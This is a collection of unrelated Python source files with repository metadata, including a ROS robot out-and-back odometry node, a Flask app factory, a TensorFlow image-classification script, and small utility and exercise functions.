81eff1c9bc75cd524153400cdbd7c453ee8e3635
|
/zxcar_ws/src/zxcar_nav/nodes/odom_out_and_back.py
|
996790219d20a191ee2afb68a5e9d7506c6217f4
|
[] |
no_license
|
sukai33/zxcar_all
|
bbacbf85c5e7c93d2e98b03958342ec01e3dafd9
|
af389f095591a70cae01c1d116aa74d68223f317
|
refs/heads/master
| 2023-01-03T13:32:00.864543
| 2020-10-29T05:22:43
| 2020-10-29T05:22:43
| 300,556,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,622
|
py
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist, Point, Quaternion
import tf
from zxcar_nav.transform_utils import quat_to_angle, normalize_angle
from math import radians, copysign, sqrt, pow, pi
class OutAndBack():
def __init__(self):
# Give the node a name
rospy.init_node('out_and_back', anonymous=False)
# Set rospy to execute a shutdown function when exiting
rospy.on_shutdown(self.shutdown)
# Publisher to control the robot's speed
self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=5)
# How fast will we update the robot's movement?
rate = 20
# Set the equivalent ROS rate variable
r = rospy.Rate(rate)
# Set the forward linear speed to 0.15 meters per second
linear_speed = 0.15
# Set the travel distance in meters
goal_distance = 1.0
# Set the rotation speed in radians per second
angular_speed = 0.5
# Set the angular tolerance in degrees converted to radians
angular_tolerance = radians(1.0)
# Set the rotation angle to Pi radians (180 degrees)
goal_angle = pi
# Initialize the tf listener
self.tf_listener = tf.TransformListener()
# Give tf some time to fill its buffer
rospy.sleep(2)
# Set the odom frame
self.odom_frame = '/odom'
# Find out if the robot uses /base_link or /base_footprint
try:
self.tf_listener.waitForTransform(self.odom_frame, '/base_footprint', rospy.Time(), rospy.Duration(1.0))
self.base_frame = '/base_footprint'
except (tf.Exception, tf.ConnectivityException, tf.LookupException):
try:
self.tf_listener.waitForTransform(self.odom_frame, '/base_link', rospy.Time(), rospy.Duration(1.0))
self.base_frame = '/base_link'
except (tf.Exception, tf.ConnectivityException, tf.LookupException):
rospy.loginfo("Cannot find transform between /odom and /base_link or /base_footprint")
rospy.signal_shutdown("tf Exception")
# Initialize the position variable as a Point type
position = Point()
# Loop once for each leg of the trip
for i in range(2):
# Initialize the movement command
move_cmd = Twist()
# Set the movement command to forward motion
move_cmd.linear.x = linear_speed
# Get the starting position values
(position, rotation) = self.get_odom()
x_start = position.x
y_start = position.y
# Keep track of the distance traveled
distance = 0
# Enter the loop to move along a side
while distance < goal_distance and not rospy.is_shutdown():
# Publish the Twist message and sleep 1 cycle
self.cmd_vel.publish(move_cmd)
r.sleep()
# Get the current position
(position, rotation) = self.get_odom()
# Compute the Euclidean distance from the start
distance = sqrt(pow((position.x - x_start), 2) +
pow((position.y - y_start), 2))
# Stop the robot before the rotation
move_cmd = Twist()
self.cmd_vel.publish(move_cmd)
rospy.sleep(1)
# Set the movement command to a rotation
move_cmd.angular.z = angular_speed
# Track the last angle measured
last_angle = rotation
# Track how far we have turned
turn_angle = 0
while abs(turn_angle + angular_tolerance) < abs(goal_angle) and not rospy.is_shutdown():
# Publish the Twist message and sleep 1 cycle
self.cmd_vel.publish(move_cmd)
r.sleep()
# Get the current rotation
(position, rotation) = self.get_odom()
# Compute the amount of rotation since the last loop
delta_angle = normalize_angle(rotation - last_angle)
# Add to the running total
turn_angle += delta_angle
last_angle = rotation
# Stop the robot before the next leg
move_cmd = Twist()
self.cmd_vel.publish(move_cmd)
rospy.sleep(1)
# Stop the robot for good
self.cmd_vel.publish(Twist())
def get_odom(self):
# Get the current transform between the odom and base frames
try:
(trans, rot) = self.tf_listener.lookupTransform(self.odom_frame, self.base_frame, rospy.Time(0))
except (tf.Exception, tf.ConnectivityException, tf.LookupException):
rospy.loginfo("TF Exception")
return
return (Point(*trans), quat_to_angle(Quaternion(*rot)))
def shutdown(self):
# Always stop the robot when shutting down the node.
rospy.loginfo("Stopping the robot...")
self.cmd_vel.publish(Twist())
rospy.sleep(1)
if __name__ == '__main__':
try:
OutAndBack()
except:
rospy.loginfo("Out-and-Back node terminated.")
|
[
"422168787@qq.com"
] |
422168787@qq.com
|
930cbd02d0f423a4e087247dbdcc1fd14617649f
|
5b2123213495bb7892cf336cce6b5a613ece5cc6
|
/src/faf/tools/md5.py
|
df55a662ee01ee654b4ae2c97e43828bd72f774e
|
[] |
no_license
|
Wesmania/fafpyclient-mockup
|
06e6e1b8258e894eb1f8f27de8cdfb27a76b8574
|
d8d744ff6c81a6197dff8dc638ecb219b9dd9b70
|
refs/heads/master
| 2022-09-27T06:47:53.979785
| 2020-06-02T20:25:56
| 2020-06-02T20:25:56
| 255,061,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
import hashlib
def md5(text):
m = hashlib.md5()
m.update(text.encode('utf-8'))
return m.hexdigest()
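# Quick sanity check (well-known MD5 test vector):
#   md5('hello') == '5d41402abc4b2a76b9719d911017c592'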
|
[
"i.kotrasinsk@gmail.com"
] |
i.kotrasinsk@gmail.com
|
94c926414287861d3a32a08b2df635ca67a7b61c
|
ec00584ab288267a7cf46c5cd4f76bbec1c70a6b
|
/offline/__Digital_Twin/__release2/rough_data/rrps.dt.follower.example/rrps/dt/__init__.py
|
33521ddf66690c4e443af46cdc3b83fb4241df4e
|
[] |
no_license
|
rahuldbhadange/Python
|
b4cc806ff23953389c9507f43d817b3815260e19
|
7e162117f1acc12537c7eeb36d6983d804122ff3
|
refs/heads/master
| 2021-06-23T05:04:20.053777
| 2020-01-28T10:34:28
| 2020-01-28T10:34:28
| 217,307,612
| 0
| 0
| null | 2021-06-10T22:44:11
| 2019-10-24T13:35:42
|
Python
|
UTF-8
|
Python
| false
| false
| 252
|
py
|
# For pkgutil namespace compatibility only. Must NOT contain anything else. See also:
# https://packaging.python.org/guides/packaging-namespace-packages/#pkgutil-style-namespace-packages
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
|
[
"46024570+rahuldbhadange@users.noreply.github.com"
] |
46024570+rahuldbhadange@users.noreply.github.com
|
5c0f18ca80a73c71aa9dcfb6977ae5ae66dc1b96
|
c9f8845a8e16ccf82dad497fa2a51a9465246b6c
|
/person.py
|
f036148f0a7e4370c05ebd6315009f5e06bfc673
|
[] |
no_license
|
EstherPholie/dev2
|
62cde5e9efe19d6eb725838affbba0fd9af7c94d
|
50272c2b71b2eff68f705f49ab50413276bf947d
|
refs/heads/master
| 2020-06-18T07:47:46.833049
| 2019-07-18T16:19:20
| 2019-07-18T16:19:20
| 196,220,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
def get_age():
age=int(input("Enter your age"))
return age
def get_name():
name=input("Enter your name")
print(name)
return name
myage = get_age()
myname=get_name()
print("my name is %s !" % myname)
print("my age is %d !" % myage)
print("my name is %s and my age is %d!" % (myname, myage))
|
[
"estherpyholie85@gmail.com"
] |
estherpyholie85@gmail.com
|
f8a4b61f90173f7571cd11ec7a5c7ff63d360898
|
dfee0fa1ec1abafbc176f6d013d4c06212169538
|
/test/reconfigure.py
|
407fdb88c37647df3287ff1d2b5d43ced953f129
|
[] |
no_license
|
lflxp/tf-study
|
bbcf56dfd34e52b8358cbb9c0ba3812ff2e7325c
|
deea074f210f2d34052f560988374dea0c24bb92
|
refs/heads/master
| 2020-04-19T09:15:48.383763
| 2019-01-30T18:24:47
| 2019-01-30T18:24:47
| 168,104,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,449
|
py
|
#!~/tf/venv/bin/python
# -*- coding: UTF-8 -*-
import tensorflow as tf
import numpy as np
import PIL.Image as Image
from skimage import io, transform
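# Load a frozen TensorFlow 1.x graph (.pb), feed it a 224x224 image, and print the
# softmax output plus the predicted label (the script below uses Python 2 print statements).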
def recognize(jpg_path, pb_file_path):
with tf.Graph().as_default():
output_graph_def = tf.GraphDef()
with open(pb_file_path, "rb") as f:
output_graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(output_graph_def, name="")
with tf.Session() as sess:
init = tf.global_variables_initializer()
sess.run(init)
input_x = sess.graph.get_tensor_by_name("input:0")
print input_x
out_softmax = sess.graph.get_tensor_by_name("softmax:0")
print out_softmax
out_label = sess.graph.get_tensor_by_name("output:0")
print out_label
img = io.imread(jpg_path)
img = transform.resize(img, (224, 224, 3))
img_out_softmax = sess.run(out_softmax, feed_dict={input_x:np.reshape(img, [-1, 224, 224, 3])})
print "img_out_softmax:",img_out_softmax
prediction_labels = np.argmax(img_out_softmax, axis=1)
print "label:",prediction_labels
recognize("./pic/dog5.jpg", "train2.pb")
# ---------------------
# Author: ppplinday
# Source: CSDN
# Original post: https://blog.csdn.net/u014432647/article/details/75276718
# Copyright notice: this is the blogger's original article; please include a link to the original post when reposting.
[
"382023823@qq.com"
] |
382023823@qq.com
|
f9320732fb97365a434b7cfa02c9bf5ac40c293b
|
4f2e28f4a6dcb82029a187a7708684fffaca9722
|
/app.py
|
3c19b50311dbcfa432b00da2cc79151b805eeaa5
|
[] |
no_license
|
NamanChuriwala/ChatZoo
|
9ae12f8ec4a29a12c27421c99b3de3e1fd897d67
|
50820761ed010a3d95124f280882f93da9e731f1
|
refs/heads/master
| 2022-11-05T06:11:33.890272
| 2020-06-19T16:52:28
| 2020-06-19T16:52:28
| 273,540,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 743
|
py
|
from flask import Flask, jsonify, request, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
import os
from dotenv import load_dotenv
load_dotenv('./chatzoo.env')
SECRET_KEY = os.urandom(32)
DB_URI = os.environ.get('DB_URI')
db = SQLAlchemy()
login_manager = LoginManager()
rooms = ['coding', 'gaming', 'art', 'music']
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = SECRET_KEY
app.config['SQLALCHEMY_DATABASE_URI'] = DB_URI
app.config['SQLALCHEMY_ECHO'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
login_manager.init_app(app)
with app.app_context():
import routes
db.create_all()
return app
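# Illustrative usage (assuming a separate entry-point script, not shown here):
#   app = create_app()
#   app.run(debug=True)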
|
[
"bondnam96@gmail.com"
] |
bondnam96@gmail.com
|
dfef097237cdcb18aff0d3b69da840e8e0c440de
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/nn7Na6zHLEHS9R8j2_21.py
|
fcae13e8a60d7d2553b9fa6c7f770ad1376b9dda
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
"""
Create a function that takes a list and returns the number of ALL elements
within it (including those within the sub-level list(s)).
### Examples
deep_count([1, 2, 3]) ➞ 3
deep_count([[1], [2], [3]]) ➞ 6
deep_count(["x", "y", ["z"]]) ➞ 4
deep_count(["a", "b", ["c", "d", ["e"]]]) ➞ 7
### Notes
In the examples above, notice how the sub-lists within the main list count as
an element _as well as_ the elements within that sub-list.
"""
def deep_count(lst):
if not isinstance(lst,list):
return 1
s = 0
for item in lst:
if not isinstance(item,list):
s = s + 1
else:
s = s + 1
s = s + deep_count(item)
return s
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|